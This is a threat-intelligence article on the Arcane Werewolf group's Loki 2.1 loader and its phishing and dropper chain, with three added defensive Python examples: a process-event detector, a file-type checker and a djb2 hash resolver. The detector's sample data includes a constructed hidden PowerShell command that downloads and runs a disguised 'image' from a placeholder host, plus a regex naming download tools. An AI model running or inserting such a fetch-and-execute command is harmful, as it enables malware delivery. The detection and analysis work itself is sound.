The cyber espionage group known as Arcane Werewolf (also tracked as Mythic Likho) has significantly upgraded its offensive capabilities, targeting Russian manufacturing enterprises with a new iteration of its custom malware.
According to a report by BI.ZONE Threat Intelligence, campaigns observed in October and November 2025 show that the group has moved from the Loki 2.0 loader to a more sophisticated Loki 2.1 variant, which uses updated delivery mechanisms to evade detection.
The attacks began with the group’s signature technique: phishing emails disguised as official correspondence. These messages contained links directing victims to spoofed websites that meticulously mimicked legitimate Russian manufacturing companies.
In the October campaign, victims were tricked into downloading ZIP archives containing malicious LNK files. Once executed, these files triggered a PowerShell command to retrieve a Go-based dropper disguised as an image file.
This dropper served a dual purpose: it opened a harmless decoy PDF such as “Outgoing notification No. 7784” to distract the user while silently executing the Loki 2.0 loader in the background.
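The October chain described above (a double-clicked LNK launching PowerShell, which fetches a dropper named like an image) leaves a recognisable trace in process-creation telemetry. The following is an added detection example, not code from the article or from BI.ZONE: it scores constructed process events on the combination of a download primitive and a remote file with an image extension, with the explorer.exe parent and hidden-window flags as supporting context. Event fields, the sample command lines and the `example.invalid` host are all constructed.

```python
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    """A minimal process-creation record (constructed shape, not a real EDR schema)."""
    pid: int
    parent_image: str
    image: str
    command_line: str


# Constructed sample events. 102 mimics the LNK -> PowerShell -> "image" dropper step;
# 101 and 103 are ordinary user activity that must not fire.
SAMPLE_EVENTS = [
    ProcEvent(101, r"C:\Windows\explorer.exe", r"C:\Windows\System32\cmd.exe",
              'cmd.exe /c start "" "C:\\Users\\u\\Downloads\\Report.pdf"'),
    ProcEvent(102, r"C:\Windows\explorer.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              'powershell.exe -w hidden -c "Invoke-WebRequest -Uri '
              'http://example.invalid/pic.jpg -OutFile $env:TEMP\\pic.jpg; '
              'Start-Process $env:TEMP\\pic.jpg"'),
    ProcEvent(103, r"C:\Windows\explorer.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              'powershell.exe -c "Get-ChildItem C:\\Users\\u\\Pictures\\*.png"'),
]

# Common PowerShell download primitives (cmdlets, .NET methods and aliases).
DOWNLOAD_PRIMITIVES = re.compile(
    r"invoke-webrequest|\biwr\b|downloadfile|downloadstring|start-bitstransfer|\bcurl\b|\bwget\b",
    re.IGNORECASE,
)
# A remote URL whose path ends in an image extension, i.e. an executable disguised as a picture.
IMAGE_URL = re.compile(r"https?://\S+?\.(?:jpe?g|png|gif|bmp)\b", re.IGNORECASE)
# -w hidden / -WindowStyle Hidden
HIDDEN_WINDOW = re.compile(r"-w(?:indowstyle)?\s+hidden", re.IGNORECASE)

STRONG_SIGNALS = {"download primitive in command line",
                  "remote file with image extension"}


def analyze_event(ev: ProcEvent) -> list:
    """Return the reasons an event matches the lure pattern, or [] when it does not.

    Only PowerShell processes are considered, and both strong signals (a download
    AND an image-named remote file) must be present; the other two reasons are
    context that raises analyst confidence but do not fire on their own.
    """
    if not ev.image.lower().endswith(("powershell.exe", "pwsh.exe")):
        return []
    reasons = []
    if ev.parent_image.lower().endswith("explorer.exe"):
        reasons.append("powershell spawned by explorer.exe (typical of a double-clicked LNK)")
    if DOWNLOAD_PRIMITIVES.search(ev.command_line):
        reasons.append("download primitive in command line")
    if IMAGE_URL.search(ev.command_line):
        reasons.append("remote file with image extension")
    if HIDDEN_WINDOW.search(ev.command_line):
        reasons.append("hidden window requested")
    return reasons if STRONG_SIGNALS.issubset(reasons) else []


def flag_events(events) -> dict:
    """Map pid -> reasons for every event that matches."""
    return {ev.pid: r for ev in events if (r := analyze_event(ev))}


if __name__ == "__main__":
    for pid, reasons in flag_events(SAMPLE_EVENTS).items():
        print(pid, "->", "; ".join(reasons))
```

Requiring both strong signals keeps the rule quiet on everyday scripting (event 103 lists local PNG files and is ignored) while still catching the lure even when the operator changes the window-style flag or launches the shell from something other than explorer.exe.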
This loader was designed to collect basic host information, encrypt it via AES, and exfiltrate it to a Command and Control (C2) server while awaiting further payloads.
However, the threat landscape evolved rapidly by November 2025. BI.ZONE researchers observed a shift in the attack chain involving a new C++ dropper.
This executable utilized low-level system calls like NtCreateFile and ZwWriteFile to extract its payload. More importantly, this campaign marked the deployment of Loki 2.1.
Unlike previous versions where the loader had to fetch the implant from a C2 server, the Loki 2.1 loader carried the upgraded implant embedded directly within its own configuration.
It decrypts and executes the implant directly in the process memory, reducing network noise and dependency on external retrieval during the initial infection phase.
The dropper carries two Base64-encoded payloads:
- chrome_proxy.pdf, a PE32+ executable (the malicious loader).
- 09.2025.pdf, a PDF decoy.
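A loader stored under a .pdf name is exactly the case where a file's declared type and its real type disagree. The following added example (not code from the article or from BI.ZONE) decodes Base64 payloads and classifies each one by magic bytes, flagging any whose content does not match the extension. The PE32+ header and the decoy PDF bytes are constructed in the script; the decoy file name is a placeholder because the page only shows it truncated.

```python
import base64
import struct


def file_type(blob: bytes) -> str:
    """Classify a payload by its magic bytes rather than by its file name."""
    if blob.startswith(b"%PDF-"):
        return "PDF document"
    if blob[:2] == b"MZ" and len(blob) >= 0x40:
        # e_lfanew at offset 0x3C points at the "PE\0\0" signature
        e_lfanew = struct.unpack_from("<I", blob, 0x3C)[0]
        if blob[e_lfanew:e_lfanew + 4] == b"PE\0\0":
            # Optional header magic is 24 bytes past the signature (4 + 20-byte COFF header)
            magic_off = e_lfanew + 24
            if len(blob) >= magic_off + 2:
                magic = struct.unpack_from("<H", blob, magic_off)[0]
                if magic == 0x20B:
                    return "PE32+ executable"
                if magic == 0x10B:
                    return "PE32 executable"
            return "PE executable (unknown format)"
        return "MZ/DOS executable"
    return "unknown"


# What each extension is expected to contain; anything else is a mismatch.
EXPECTED_BY_EXT = {".pdf": "PDF document"}


def check_payload(name: str, b64: str) -> dict:
    """Decode one Base64 payload and compare its real type with its declared extension."""
    blob = base64.b64decode(b64)
    actual = file_type(blob)
    ext = name[name.rfind("."):].lower() if "." in name else ""
    expected = EXPECTED_BY_EXT.get(ext)
    return {"name": name, "actual": actual,
            "mismatch": expected is not None and actual != expected}


def _fake_pe32plus() -> bytes:
    """Constructed minimal PE32+ header: DOS stub, COFF header, optional-header magic only."""
    dos = bytearray(64)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 64)          # e_lfanew = 64
    coff = b"PE\0\0" + struct.pack("<HHIIIHH", 0x8664, 0, 0, 0, 0, 0, 0)  # x64 machine
    opt = struct.pack("<H", 0x20B)                  # PE32+ magic
    return bytes(dos) + coff + opt


# Constructed sample payloads standing in for the dropper's two embedded files.
SAMPLE_PAYLOADS = {
    "chrome_proxy.pdf": base64.b64encode(_fake_pe32plus()).decode(),
    "decoy_placeholder.pdf": base64.b64encode(b"%PDF-1.7\n%constructed decoy\n").decode(),
}


def audit(payloads: dict) -> list:
    """Run check_payload over every embedded file and return the findings in order."""
    return [check_payload(n, b) for n, b in payloads.items()]


if __name__ == "__main__":
    for finding in audit(SAMPLE_PAYLOADS):
        print(finding)
```

The same check applies to any extracted artefact: an email attachment, a file dropped from an archive, or a blob carved out of a dropper's data section. Trusting the extension is what the lure is designed to exploit, so type the bytes, not the name.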
The Loki 2.1 implant maintains compatibility with popular post-exploitation frameworks such as Mythic and Havoc but introduces distinct architectural changes.

The primary technical difference lies in command identification; while Loki 2.0 mapped commands to djb2 hash values, Loki 2.1 utilizes a streamlined ordinal number system (0–11).
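When a sample identifies commands by djb2 hash, an analyst recovers the command names by hashing candidate strings and matching them against the values found in the binary. The following added example (not code from the article or from BI.ZONE) implements djb2 as it is usually stored in 32-bit form and resolves hash values against a candidate list; the candidate command names are hypothetical, derived from the capabilities listed below rather than from the real implant's strings.

```python
def djb2(name: str) -> int:
    """Classic djb2 (h = h * 33 + c, starting from 5381), truncated to 32 bits."""
    h = 5381
    for byte in name.encode("ascii"):
        h = (h * 33 + byte) & 0xFFFFFFFF
    return h


# Hypothetical command names used only to illustrate hash resolution.
CANDIDATE_COMMANDS = ["upload", "download", "exec", "inject", "bof",
                      "token", "kill", "sleep", "exit"]


def build_hash_table(candidates=CANDIDATE_COMMANDS) -> dict:
    """Precompute hash -> name so values pulled from a sample can be looked up directly."""
    return {djb2(c): c for c in candidates}


def resolve_command(value: int, candidates=CANDIDATE_COMMANDS):
    """Return the candidate whose djb2 hash equals value, or None if no candidate matches."""
    return build_hash_table(candidates).get(value)


def identifier_scheme(values) -> str:
    """Guess which scheme a set of command identifiers uses.

    Small contiguous ordinals (the 0-11 range described for Loki 2.1) look nothing
    like 32-bit djb2 outputs, so this is a quick triage hint before disassembly.
    """
    values = list(values)
    if values and all(0 <= v <= 11 for v in values):
        return "ordinal"
    if all(v > 0xFFFF for v in values):
        return "hash-like"
    return "mixed/unknown"


if __name__ == "__main__":
    table = build_hash_table()
    for h, name in sorted(table.items()):
        print(f"0x{h:08x} -> {name}")
    print(identifier_scheme(table))
    print(identifier_scheme(range(12)))
```

Unresolved hashes simply return None; extending the candidate list (for example with verbs used by Mythic and Havoc agent profiles) is the usual next step when a value does not match.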
The arsenal available to Arcane Werewolf through Loki 2.1 is extensive. The toolkit allows the attackers to:
- Manage Files: Upload and download data between the host and C2 server.
- Execute Code: Run processes via CreateProcessW or inject code (DLLs and shellcode) into target processes.
- Advanced Operations: Execute Beacon Object Files (BOF), manipulate Windows access tokens, and terminate specific processes.
- Persist and Evade: Change sleep intervals to mask traffic and clean up operations via an exit command.
Arcane Werewolf’s continued reliance on brand impersonation remains a critical threat factor. By leveraging domain names that closely resemble those of major industry players and regulators, they exploit the trust inherent in the manufacturing sector.
Organizations are advised to scrutinize incoming correspondence for subtle domain irregularities, as the group continues to refine its technical tradecraft.
